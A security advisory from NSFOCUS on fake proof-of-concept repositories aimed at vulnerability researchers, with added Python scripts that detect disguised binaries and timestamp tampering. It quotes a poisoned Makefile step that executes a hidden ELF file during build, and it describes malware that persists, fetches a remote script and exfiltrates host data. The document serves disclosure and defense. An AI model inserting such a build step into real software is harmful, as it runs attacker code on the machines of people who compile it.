Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack

July 5, 2023 | NSFOCUS


NSFOCUS researchers recently detected a code poisoning attack against vulnerability researchers and red team members. The attackers planted malicious programs in several code repositories disguised as proof-of-concept exploits for two highly exploitable Linux and VMware vulnerabilities disclosed this year. Once a user downloads the code and compiles it locally, the malicious code embedded in the build script is executed, giving the attackers control of the host.

At the time of writing, two code repositories containing the malicious code and the CnC address are still alive, so this remains an ongoing attack.

Figure 1 PoC repository 1 with malicious code – Linux kernel privilege escalation vulnerability

Figure 2 PoC repository 2 with malicious code – VMware privilege escalation vulnerability

The commit history shows that the attacker uploaded the malicious code in multiple commits starting at the end of June 2023.

Figure 3 Code Commit Timeline

The attack was exposed two days after the malicious code was uploaded, when repository users opened an issue alleging that the PoC is fake and that malicious code has been implanted.

Figure 4 Comments about fake PoC

Analysis of Techniques and Tactics

Figure 5 Execution flow

Poisoning of disguised compiled configuration files

From a supply chain security perspective, the attackers used code poisoning to strike during the code compilation step. Compared with hosting a binary payload in the repository, as phishing campaigns commonly do, implanting malicious code in the build configuration files is far more subtle.

CFLAGS= -I./inc
LDFLAGS= -pthread -static

all: obj $(TARGET) get_root

	$(CC) $(LDFLAGS) -o $@ $^
	strip $@
	./src/aclocal.m4    # <-- executes the malicious program shipped in the repository

The Makefile contains the commands that compile and link the binaries, and the attacker inserted a step that executes the file aclocal.m4 from the src directory into the normal build flow. aclocal.m4 is the name of a standard file generated by GNU automake, and the attacker reused that name to make the file look legitimate; here aclocal.m4 is in fact a malicious Linux program. As soon as the user runs the make command, the build proceeds and the malicious program is executed along with it.

aclocal.m4: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/,
BuildID[sha1]=9fc8befaa32a1a88133dd077db0369576313e6d2, for GNU/Linux 3.2.0, stripped
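The check a reviewer of a downloaded PoC would want before typing make is mechanical: does any file whose name suggests text (an .m4 macro file, a header, a config) actually start with the ELF magic, and does any tab-indented recipe line in a Makefile run a repository-relative path directly? The following audit script is an added example written for this article, not code from NSFOCUS or from the repositories described; it reproduces the poisoned Makefile pattern shown above in a constructed temporary repository (with a fake, non-functional file that only carries the ELF magic bytes) and reports both findings. The extension list and the Makefile layout are assumptions for the demonstration.

```python
import os
import re
import tempfile

ELF_MAGIC = b"\x7fELF"

# Extensions that should contain text (build scripts, sources, macros), never
# a native executable. Assumed list for this example; extend as needed.
TEXT_LIKE_EXTENSIONS = {".m4", ".ac", ".in", ".mk", ".am", ".txt", ".md",
                        ".h", ".c", ".cfg", ".conf", ".json", ".yml", ".yaml"}

# Tokens inside a recipe line that point at a repository-relative path,
# e.g. "./src/aclocal.m4" or "../tools/helper" (but not "-I./inc").
REPO_PATH_RE = re.compile(r"(?<![\w./-])(\.{1,2}/[\w./-]+)")

# Constructed Makefile modelled on the poisoned one quoted in the article.
MAKEFILE_TEXT = (
    "CFLAGS= -I./inc\n"
    "LDFLAGS= -pthread -static\n"
    "TARGET= exploit\n"
    "\n"
    "all: $(TARGET)\n"
    "\n"
    "$(TARGET): src/main.c\n"
    "\t$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^\n"
    "\tstrip $@\n"
    "\t./src/aclocal.m4\n"
)


def is_elf(path):
    """True if the file begins with the ELF magic bytes."""
    try:
        with open(path, "rb") as fh:
            return fh.read(4) == ELF_MAGIC
    except OSError:
        return False


def find_disguised_binaries(repo_root):
    """Repo-relative paths of files that look like text by name but are ELF."""
    hits = []
    for dirpath, _dirs, files in os.walk(repo_root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.splitext(name)[1].lower() in TEXT_LIKE_EXTENSIONS and is_elf(full):
                hits.append(os.path.relpath(full, repo_root))
    return sorted(hits)


def find_recipe_executions(makefile_path):
    """(line_number, invoked_path, is_elf) for recipe lines running a repo path.

    Only tab-indented lines are recipes, i.e. the lines make hands to the shell.
    """
    makefile_dir = os.path.dirname(makefile_path)
    findings = []
    with open(makefile_path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            if not line.startswith("\t"):
                continue
            for token in REPO_PATH_RE.findall(line):
                target = os.path.normpath(os.path.join(makefile_dir, token))
                findings.append((lineno, token, is_elf(target)))
    return findings


def audit_repo(repo_root):
    """Run both checks over a checked-out repository and return a report dict."""
    report = {"disguised_binaries": find_disguised_binaries(repo_root),
              "recipe_executions": []}
    for dirpath, _dirs, files in os.walk(repo_root):
        for name in files:
            if name in ("Makefile", "makefile", "GNUmakefile") or name.endswith(".mk"):
                path = os.path.join(dirpath, name)
                for lineno, token, elf in find_recipe_executions(path):
                    report["recipe_executions"].append(
                        (os.path.relpath(path, repo_root), lineno, token, elf))
    return report


def build_demo_repo(root):
    """Create the constructed sample repository: one benign source, one disguised binary."""
    os.makedirs(os.path.join(root, "src"))
    with open(os.path.join(root, "Makefile"), "w") as fh:
        fh.write(MAKEFILE_TEXT)
    with open(os.path.join(root, "src", "main.c"), "w") as fh:
        fh.write("int main(void) { return 0; }\n")
    # Stand-in for the disguised binary: ELF magic plus filler, not a runnable program.
    with open(os.path.join(root, "src", "aclocal.m4"), "wb") as fh:
        fh.write(ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 61)


def demo():
    """Build the sample repository in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_repo(root)
        return audit_repo(root)


if __name__ == "__main__":
    print(demo())
```

Run it against a real checkout with audit_repo("/path/to/repo"). A recipe that invokes a repository path which turns out to be an ELF file is the strongest signal; a direct invocation of any repo-local file from a recipe deserves a manual look even when the target is a script, since that is where a poisoned build runs attacker code.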

Multistage Malicious Sample kworker with Built-in Defense Evasion Feature

On first execution, the sample copies itself to the HOME directory and establishes persistence.

Figure 6 Copy itself to the HOME directory and add persistence

Defense evasion: timestamp modification; the sample forges file timestamps to conceal the attacker's activity.

Figure 7 Defense evasion
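Timestamp forgery of this kind leaves a trace that a responder can look for: utime() and touch rewrite a file's atime and mtime, but only the kernel updates the inode change time (ctime), so a backdated mtime ends up far behind its own ctime. The scanner below is an added example written for this article, not code from NSFOCUS or from the sample; it walks a directory (HOME is the natural target, given the copy-to-HOME behaviour described above), flags files whose mtime predates their ctime by more than a day or whose name matches the dropped sample's name, and demonstrates itself on a constructed temporary directory. The gap threshold and the name list are assumptions.

```python
import os
import stat
import tempfile
import time

# The article reports that the sample drops itself under this name; assumed watch list.
SUSPICIOUS_NAMES = {"kworker"}
ONE_DAY = 86400


def timestomp_suspects(root, min_gap_seconds=ONE_DAY):
    """Return files under root whose mtime trails ctime by more than min_gap_seconds,
    or whose name is on the watch list. Symlinks are skipped; dicts are sorted by path."""
    suspects = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):
                continue
            gap = st.st_ctime - st.st_mtime   # positive when mtime was pushed into the past
            name_hit = name in SUSPICIOUS_NAMES
            if gap > min_gap_seconds or name_hit:
                suspects.append({
                    "path": path,
                    "name": name,
                    "ctime_minus_mtime_days": round(gap / ONE_DAY, 1),
                    "executable": bool(st.st_mode & stat.S_IXUSR),
                    "name_hit": name_hit,
                })
    return sorted(suspects, key=lambda s: s["path"])


def demo():
    """Constructed scenario: a backdated executable named kworker beside an untouched file."""
    with tempfile.TemporaryDirectory() as home:
        dropped = os.path.join(home, "kworker")
        with open(dropped, "wb") as fh:
            fh.write(b"placeholder, not a real binary\n")
        os.chmod(dropped, 0o755)
        # Emulate timestomping: push atime/mtime 400 days back; ctime stays "now".
        backdated = time.time() - 400 * ONE_DAY
        os.utime(dropped, (backdated, backdated))

        with open(os.path.join(home, "notes.txt"), "w") as fh:
            fh.write("benign file with consistent timestamps\n")

        return timestomp_suspects(home)


if __name__ == "__main__":
    for s in demo():
        print(s)
```

Treat a hit as a triage lead rather than proof: cp -p, tar extraction and git checkouts also produce files whose mtime is older than their ctime. What separates the case described here is the combination, an executable in HOME, a kernel-thread-like name, and a timestamp gap with no matching package or archive provenance.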

It pulls content from a hardcoded URL and decrypts it.

Figure 8 Pull the content and decrypt it

During testing, we found that when a request is malformed, the attacker's server returns empty content and blacklists the requesting IP address.

Figure 9 Empty content is returned

The actual content requested is a bash script [1]. On the one hand, this script collects information from the host and uploads it to a public repository, through which the victim is linked back to the attacker's server; on the other hand, it establishes persistence and continuing control through SSH.

Figure 10 Returned content

At the time of writing, NSFOCUS Threat Intelligence supports detection and alerting on the involved infrastructure, and some NSFOCUS products have already captured attack events using this malware.

Figure 11 Screenshot from NSFOCUS Threat Intelligence (NTI)


In recent years, attacks of this kind that target vulnerability researchers and red team members with exploit code as bait have not been uncommon. Compared with the earlier approach of baiting with malicious EXE files, implanting malicious code in build configuration files so that it triggers during compilation makes the exploitation chain far more covert. It does require the victim to be able to compile an exploit from the command line, which screens out the many people who simply run exploit programs downloaded from the Internet; in other words, the targeting has shifted to vulnerability researchers and red team members capable of weaponizing vulnerabilities.

Based on existing intelligence and a preliminary survey of the attacker's infrastructure, we believe this code poisoning attack may have been long in preparation and is part of a persistent campaign: pick a small project with little attention and few stars to test feasibility, and collect the information needed for later planned activity.

IOC Information

Malicious Github Repo:
Malicious sample kworker SHA256: caa69b10b0bfca561dec90cbd1132b6dcb2c8a44d76a272a0b70b5c64776ff6c
Payload delivery, CnC address: